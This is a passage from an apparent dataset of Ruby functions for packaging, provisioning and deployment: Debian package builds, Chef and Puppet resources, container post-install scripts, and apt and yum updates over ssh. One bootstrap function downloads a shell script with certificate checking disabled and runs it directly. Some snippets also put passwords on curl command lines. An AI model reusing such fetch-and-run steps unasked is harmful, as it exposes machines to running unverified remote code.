pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n ########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def replace_znc_config env\n FileUtils.rm_rf(config_path) if File.directory?(config_path)\n FileUtils.cp_r config_template_path(env), config_path\n end",
"def packages debs, role\n run \"#{sudo} apt-get -y update && #{sudo} apt-get -y upgrade && #{sudo} apt-get install -y #{debs}\", :role => role\nend",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def set_vars\n #Set up vars with AEM package manager urls, etc.\n vars = {}\n vars[:recursive] = new_resource.recursive ? '\\\\&recursive=true' : \"\"\n vars[:file_name] = \"#{new_resource.name}-#{new_resource.version}\" +\n \"#{new_resource.file_extension}\"\n vars[:download_url] = new_resource.package_url\n vars[:file_path] = \"#{Chef::Config[:file_cache_path]}/#{vars[:file_name]}\"\n vars[:user] = new_resource.user\n vars[:password] = new_resource.password\n vars[:port] = new_resource.port\n vars[:group_id] = new_resource.group_id\n vars[:upload_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -F\" +\n \" package=@#{vars[:file_path]} http://localhost:\" +\n \"#{vars[:port]}/crx/packmgr/service/.json?cmd=upload\"\n vars[:delete_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=delete\"\n vars[:install_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=install#{vars[:recursive]}\"\n vars[:activate_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=replicate\"\n vars[:uninstall_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=uninstall\"\n\n vars\nend",
"def update\n tmp_file = Rails.root.join('tmp', 'deployment-rc.yml')\n self.to_file tmp_file\n self.class.replace tmp_file\n end",
"def post_update_extension volume_root, options\n if !options[:extensions][:up_to_date] and options[:extensions][:postinstall]\n IESD::Packages::OSInstall.new(File.join(volume_root, PACKAGES, \"OSInstall.pkg\")).postinstall_extensions options[:extensions]\n end\n if !options[:mach_kernel] and File.exist? (mach_kernel = File.join(volume_root, \"mach_kernel\"))\n system(\"/usr/bin/env\", \"rm\", mach_kernel)\n end\n end",
"def bootstrap\n @commands += [\n \"export HOME=`pwd`\" ,\"\\n\",\n \"wget --no-check-certificate https://raw.githubusercontent.com/bcwik9/ScriptsNStuff/master/setup_dev_server.sh && bash setup_dev_server.sh\", \"\\n\"\n ]\n end",
"def update\n app_dir = app_dir\n # there's probably a git gem we could use here\n system \"cd #{app_dir} && git pull\" unless app_dir.nil?\n system \"cd #{File.dirname(__FILE__)} && git pull\"\nend",
"def path_boot\n case node['platform']\n when \"exherbo\", \"ubuntu\", \"arch\"\n return \"/etc/modules-load.d/#{new_resource.name}.conf\"\n when \"debian\", \"ubuntu\"\n return \"/etc/modules\"\n end\nend",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app. But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/bash '\n f.puts ' '\n f.puts 'function fcomp() '\n f.puts '{ '\n f.puts ' awk -v n1=$1 -v n2=$2 \\'BEGIN{ if (n1 == n2) print \"yes\"; else print \"no\"}\\' '\n f.puts '} '\n f.puts ' '\n f.puts 'function multiplyArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' mulResult=`echo $input1 $input2 | awk \\'{printf \"%d\", $1*$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function divideArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' divResult=`echo $input1 $input2 | awk \\'{printf \"%.2f\", $1/$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function scaleArgs() '\n f.puts '{ '\n f.puts ' inputToken=$1 '\n f.puts ' factor=$2 '\n f.puts ' numberToken=`echo $inputToken | tr -cd [0-9] ` '\n f.puts ' argPrefix=`echo $inputToken | sed -e \\'s/m$//g\\' | tr -cd [a-zA-Z-+:=] ` '\n f.puts ' multiplyArgs $numberToken $factor '\n f.puts ' # Result saved in mulResult variable '\n f.puts ' scaled_number=$mulResult '\n f.puts ' scaled_token=${argPrefix}${scaled_number}m '\n f.puts '} '\n f.puts ' '\n f.puts '# There are 5 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s /home/vcap/app /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n end\n end",
"def populate_lxc_post()\n post_list = []\n post_list.push(\"#!/bin/sh\")\n post_list.push(\"# Install additional pacakges\")\n post_list.push(\"\")\n post_list.push(\"export TERM=vt100\")\n post_list.push(\"export LANGUAGE=en_US.UTF-8\")\n post_list.push(\"export LANG=en_US.UTF-8\")\n post_list.push(\"export LC_ALL=en_US.UTF-8\")\n post_list.push(\"locale-gen en_US.UTF-8\")\n post_list.push(\"\")\n post_list.push(\"if [ \\\"`lsb_release -i |awk '{print $3}'`\\\" = \\\"Ubuntu\\\" ] ; then\")\n post_list.push(\" dpkg-reconfigure locales\")\n post_list.push(\" cp /etc/apt/sources.list /etc/apt/sources.list.orig\")\n post_list.push(\" sed -i 's,#{$default_ubuntu_mirror},#{$local_ubuntu_mirror},g' /etc/apt/sources.list.orig\")\n post_list.push(\" apt-get install -y avahi-daemon\")\n post_list.push(\" apt-get install -y libterm-readkey-perl 2> /dev/null\")\n post_list.push(\" apt-get install -y puppet 2> /dev/null\")\n post_list.push(\" apt-get install -y nfs-common 2> /dev/null\")\n post_list.push(\" apt-get install -y openssh-server 2> /dev/null\")\n post_list.push(\" apt-get install -y python-software-properties 2> /dev/null\")\n post_list.push(\" apt-get install -y software-properties-common 2> /dev/null\")\n post_list.push(\"fi\")\n post_list.push(\"\")\n repo_file = \"/etc/yum.repos.d/CentOS-Base.repo\"\n post_list.push(\"if [ \\\"`lsb_release -i |awk '{print $3}'`\\\" = \\\"Centos\\\" ] ; then\")\n post_list.push(\" sed -i 's/^mirror./#&/g' #{repo_file}\")\n post_list.push(\" sed -i 's/^#\\\\(baseurl\\\\)/\\\\1/g' #{repo_file}\")\n post_list.push(\" sed -i 's,#{$default_centos_mirror},#{$local_centos_mirror}' #{repo_file}\")\n post_list.push(\" yum -y install avahi-daemon\")\n post_list.push(\" chkconfig avahi-daemon on\")\n post_list.push(\" service avahi-daemon start\")\n post_list.push(\" rpm -i http://fedora.mirror.uber.com.au/epel/5/i386/epel-release-5-4.noarch.rpm\")\n post_list.push(\" yum -y install puppet\")\n post_list.push(\"fi\")\n post_list.push(\"\")\n return post_list\nend",
"def copy_config\n with_deb_dir do\n mkdir [ 'etc/init.d', 'etc/kafka', 'usr/lib/kafka', 'var/log/kafka',\n 'etc/security/limits.d', 'etc/default', 'etc/logrotate.d' ]\n end\n cp_conf \"default\", \"etc/default/kafka\"\n cp_conf \"init.debian\", \"etc/init.d/kafka\"\n cp_conf \"kafka-nofiles.conf\", \"etc/security/limits.d/kafka-nofiles.conf\"\n cp_conf 'logrotate', 'etc/logrotate.d/kafka'\n end",
"def save_stage_one\n\tunless File.exists? @builddir + \"/stage01.tar.xz\"\n\t\t### Dir.chdir(@builddir + \"/stage01\")\n\t\t# system \"tar -C \" + @builddir + \"/stage01 -cvjf \" + @builddir + \"/stage01/chroot.tbz chroot\"\n\t\t# system \"mysqldump --add-drop-table --password='\" + @dbpass + \"' -u '\" + @dbuser + \"' '\" + @dbname + \"' > chroot.sql \"\n\t\t# system \"bzip2 -c \" + @builddir + \"/lesslinux.sqlite > \" + @builddir + \"/stage01/chroot.sqlite.bz2\"\n\t\tsystem \"tar -C \" + @builddir + \"/ -cvJf \" + @builddir + \"/stage01.tar.xz stage01/chroot lesslinux.sqlite\"\n\tend\nend",
"def initialize_reprepro_conf_dir(release_prefix)\n if !@reprepro_lock.owned?\n raise ThreadError.new\n end\n \n conf_dir = File.join(deb_repository, release_prefix, \"conf\")\n if File.exist? conf_dir\n Packager.info \"Reprepo repository exists: #{conf_dir}\"\n else\n Packager.info \"Initializing reprepo repository in #{conf_dir}\"\n system(\"sudo\", \"mkdir\", \"-p\", conf_dir, :close_others => true)\n\n user = Etc.getpwuid(Process.uid).name\n Packager.info \"Set owner #{user} for #{deb_repository}\"\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository, :close_others => true)\n system(\"sudo\", \"chown\", \"-R\", user, deb_repository + \"/\", :close_others => true)\n system(\"sudo\", \"chmod\", \"-R\", \"755\", conf_dir, :close_others => true)\n end\n\n distributions_file = File.join(conf_dir, \"distributions\")\n if !File.exist?(distributions_file)\n File.open(distributions_file,\"w\") do |f|\n Config.linux_distribution_releases.each do |release_name, release|\n f.write(\"Codename: #{release_name}\\n\")\n f.write(\"Architectures: #{Config.architectures.keys.join(\" \")} source\\n\")\n f.write(\"Components: main\\n\")\n f.write(\"UDebComponents: main\\n\")\n f.write(\"Tracking: minimal\\n\")\n f.write(\"Contents:\\n\\n\")\n end\n end\n end\n end",
"def install_dev_repo_on(host, package, sha, repo_configs_dir)\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n #hack for https://tickets.puppetlabs.com/browse/RE-1990\n # Previously this used `host.is_pe?`, but with AIO this is no longer\n # reliable. Defaulting to `true` since these tests only happen in PE.\n if true\n pattern = \"pl-%s-%s-repos-pe-%s-%s%s-%s.repo\"\n else\n pattern = \"pl-%s-%s-%s-%s%s-%s.repo\"\n end\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/rpm/\" % [package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n scp_to(host, repo, '/etc/yum.repos.d/')\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/deb/\" % [package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def update_software(ssh_session,hostname,username,password,local_version,depot_version,filename,mode,doaction,depot_url,reboot)\n update_available = compare_versions(local_version,depot_version,mode)\n if update_available == \"y\" and mode != \"check\"\n if filename.match(/[A-z]/)\n patch_file = File.basename(filename)\n depot_dir = \"/scratch/downloads\"\n depot_file = depot_dir+\"/\"+patch_file\n (ssh_session,output) = ssh_session_exec(ssh_session,\"mkdir #{depot_dir}\")\n puts \"Copying local file \"+filename+\" to \"+hostname+\":\"+depot_file\n Net::SCP.upload!(hostname, username, filename, depot_file, :ssh => { :password => password })\n else\n depot_file = depot_url\n end\n if doaction != \"y\"\n while doaction !~ /y|n/\n print \"Install update [y,n]: \"\n doaction = gets.chomp\n end\n end\n if doaction == \"y\"\n puts \"Installing \"+depot_version+\" from \"+depot_file\n (ssh_session,output) = ssh_session_exec(ssh_session,\"esxcli software vib update -d=#{depot_file}\")\n else\n puts \"Performing Dry Run - No updates will be installed\"\n (ssh_session,output) = ssh_session_exec(ssh_session,\"esxcli software vib update -d=#{depot_file} --dry-run\")\n end\n puts output\n if output.match(/Reboot Required: true/) and reboot == \"y\"\n puts \"Rebooting\"\n (ssh_session,output) = ssh_session_exec(ssh_session,\"reboot\")\n end\n end\n return ssh_session\nend",
"def update_version(branch, version, opts={})\n dir = File.join(branch, version)\n status \"Update version #{dir}\"\n\n # initialize directory\n run \"rm -rf #{dir}\"\n run \"mkdir -p #{dir}\"\n run \"cp docker-entrypoint.sh #{dir}\"\n\n if branch == \"ensocoin\"\n run \"sed -i 's/printtoconsole=1/addnode=178.88.115.118\\\\\\n addnode=194.87.146.58\\\\\\n printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/ensocoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/ensocoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/ensocoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_ensocoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/ensocoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.ensocoin/' #{dir}/docker-entrypoint.sh\"\n elsif branch == \"thebestcoin\"\n run \"sed -i 's/^\\\\(\\\\s*\\\\)printtoconsole=1/\\\\1addnode=5.230.11.232\\\\\\n\\\\1addnode=5.230.11.233\\\\\\n\\\\1printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/thebestcoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/thebestcoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/thebestcoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_thebestcoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/thebestcoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.thebestcoin/' #{dir}/docker-entrypoint.sh\"\n end\n\n # render Dockerfile\n opts[:version] = version\n opts[:home] = '.bitcoin'\n opts[:ports] = '8332 8333 18332 18333'\n\n if branch == \"ensocoin\"\n opts[:home] = '.ensocoin'\n opts[:ports] = '7992 7993 17992 17993'\n elsif branch == \"thebestcoin\"\n opts[:home] = '.thebestcoin'\n opts[:ports] = '8801 8802 18801 18802'\n end\n\n dockerfile = ERB.new(File.read(\"Dockerfile.erb\"), nil, \"-\")\n result = dockerfile.result(OpenStruct.new(opts).instance_eval { binding })\n File.write(File.join(dir, \"Dockerfile\"), result)\nend",
"def update_instace_os\n ssh_command = 'sudo apt-get update &&sudo apt-get dist-upgrade -qq && sudo apt-get autoremove -y'\n result = ''\n Net::SSH.start(get_access_ip, 'ubuntu', keys: @aws_setup_information[@environment.to_sym][:keyPath], timeout: @ssh_timeout_period) do |ssh|\n ssh.exec(ssh_command) do |_channel, _stream, data|\n result += data\n end\n end\n result\n end",
"def apt_get_update_install\n @app.packages.present? ? install_additional_packages : update_apt\n end",
"def change_boot_order\n return unless provider == :libvirt\n system \"sudo virsh destroy #{IMAGE_NAME}\" # shutdown\n system \"sudo virsh dumpxml #{IMAGE_NAME} >#{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'cdrom\\\\'/dev=\\\\'cdrom_save\\\\'/g #{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'hd\\\\'/dev=\\\\'cdrom\\\\'/g #{libvirt_definition_path}\"\n system \"sed -i.bak s/dev=\\\\'cdrom_save\\\\'/dev=\\\\'hd\\\\'/g #{libvirt_definition_path}\"\n system \"sudo virsh define #{libvirt_definition_path}\"\n end",
"def configure_vs_repo(options)\n if options['host-os-name'].to_s.match(/SunOS/)\n check_fs_exists(options,options['repodir'])\n options['netbootdir'] = options['tftpdir']+\"/\"+options['service']\n if not File.symlink?(options['repodir'])\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking vSphere net boot directory\")\n end\n check_dir_owner(options,options['netbootdir'],options['uid'])\n File.symlink(options['repodir'],options['netbootdir'])\n end\n end\n if options['host-os-name'].to_s.match(/Linux/)\n options['netbootdir'] = options['tftpdir']+\"/\"+options['service']\n check_fs_exists(options,options['netbootdir'])\n if !File.exist?(options['repodir'])\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking vSphere net boot directory\")\n end\n check_dir_owner(options,options['netbootdir'],options['uid'])\n File.symlink(options['netbootdir'],options['repodir'])\n end\n end\n check_dir = options['repodir']+\"/upgrade\"\n if options['verbose'] == true\n handle_output(options,\"Information:\\tChecking directory #{check_dir} exists\")\n end\n if not File.directory?(check_dir)\n mount_iso(options)\n options['repodir'] = options['tftpdir']+\"/\"+options['service']\n copy_iso(options)\n umount_iso(options)\n end\n options['clientdir'] = options['clientdir']+\"/\"+options['service']\n ovf_file = options['clientdir']+\"/vmware-ovftools.tar.gz\"\n if not File.exist?(ovf_file)\n wget_file(options,options['ovftarurl'],ovf_file)\n if options['host-os-uname'].match(/RedHat/) and options['host-os-version'].match(/^7|^6\\.7/)\n message = \"Information:\\tFixing permission on \"+ovf_file\n command = \"chcon -R -t httpd_sys_rw_content_t #{ovf_file}\"\n execute_command(options,message,command)\n end\n end\n return\nend",
"def update_appd_cookbook\n @ssh.exec! \"cd #{APPD_COOKBOOK_PATH}; git pull origin master\", sudo: true\n chef_exec \"berks install --path #{@cookbook_path.first} --berksfile #{APPD_COOKBOOK_PATH}/Berksfile\"\n end",
"def apt_get_update_script\n <<-ENDSCRIPT\n if [[ ! -f /tmp/apt_sources.md5 ]]; then\n apt-get -q update\n\n md5sum /etc/apt/sources.list > /tmp/apt_sources.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources.md5\n else\n md5sum /etc/apt/sources.list > /tmp/apt_sources_compare.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources_compare.md5\n\n if [[ `diff /tmp/apt_sources.md5 /tmp/apt_sources_compare.md5` ]]; then\n apt-get -q update\n fi\n\n mv /tmp/apt_sources_compare.md5 /tmp/apt_sources.md5\n fi\n ENDSCRIPT\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def decrypt_vault_and_modify_env\n begin\n puts 'Decrypting vault and binding environment parameters...'\n crypto = GPGME::Crypto.new\n fname = File.open '../_config/secrets.yaml.gpg'\n\n secrets = YAML.load(crypto.decrypt(fname).to_s)\n\n secrets.each do |k, v|\n ENV[k] = v\n puts \" - Bound environment variable '#{k}' from decrypted vault\"\n end\n puts 'Succesfully decrypted vault and bound environment parameters.'\n rescue GPGME::Error => e\n abort \"Unable to decrypt vault (#{e})\"\n end\nend",
"def update_hostname(name)\n File.open(File.join(KVM_MOUNT_POINT, name, 'etc', 'hostname'), 'w') do |file|\n file.puts name.split('.').first\n end\nend",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def config_local\n if Process.uid != 0\n warn \"Apache configuration must run as root user\"\n exit 1\n end\n\n TemplateWriter.process(\n \"config-local.yml.erb\",\n \"/srv/Portus/config/config-local.yml\",\n binding\n )\n FileUtils.chown(\"root\", \"www\", \"/srv/Portus/config/config-local.yml\")\n FileUtils.chmod(0o640, \"/srv/Portus/config/config-local.yml\")\n end",
"def configure(sb_name)\n puts \"BS: updating sandbox repository\".cyan\n rootfs = \"/var/lib/lxc/#{sb_name}/rootfs\"\n system(\"sudo /usr/sbin/chroot #{rootfs} /bin/bash -c \\\"apt-get update\\\"\")\n system(\"sudo /usr/sbin/chroot #{rootfs} apt-get -q -y install puppet lxc make build-essential libboost-test-dev\")\n puts \"BS: configuring sandbox\".cyan\n system(\"sudo cp /opt/bs/files/lxc-insider.pp #{rootfs}/etc/puppet/manifests/lxc-insider.pp\")\n system(\"sudo lxc-execute -n #{sb_name} puppet apply /etc/puppet/manifests/lxc-insider.pp\")\n puts \"BS: sandbox configured\".cyan\n end",
"def update_pacman_if_needed\n if self['platform'] =~ /archlinux/\n if @pacman_needs_update\n execute(\"pacman --sync --noconfirm --noprogressbar --refresh --sysupgrade --ignore linux --ignore linux-docs --ignore linux-headers\")\n @pacman_needs_update = false\n end\n end\n end",
"def restart_atd(vp)\n system \"ssh uw_revtr2@#{vp} 'sudo /etc/init.d/atd restart > /dev/null 2>&1'\"\n end",
"def update_setEnv_scripts\n Puppet.alert(\" begin : update_setEnv_scripts \")\n file_name = get_value4key(\"ps_config_home\", resource[:web_location_attrib]) + \"/webserv/\"\n file_name += get_value4key(\"webdomainname\", resource[:webdomain_attrib]) + \"/bin/setEnv.sh\"\n\n Puppet.debug(\" update_setEnv_scripts : #{file_name} \")\n\n text = File.read(file_name)\n Puppet.debug(\" update_setEnv_scripts 1 : #{file_name} \")\n httpsport = get_value4key(\"webadminserverhttps\", resource[:webadmin_server_attrib] )\n\n Puppet.debug(\" update_setEnv_scripts 1A : #{httpsport} \")\n ##new_contents = text.gsub(/443/, get_value4key(\"webadminserverhttps\", resource[:webadmin_server_attrib] ) )\n\n Puppet.debug(\" update_setEnv_scripts 2 : #{file_name} \")\n new_contents1 = text.gsub(/9999/, get_value4key(\"webadminserverhttp\", resource[:webadmin_server_attrib] ) )\n\n Puppet.debug(\" update_setEnv_scripts 3 : #{file_name} \")\n jvm_small_size1= \"-Xms2048m\"\n jvm_max_size2= \"-Xmx2048m\"\n jvm_small_size2= \"-Xms1024m\"\n jvm_max_size2= 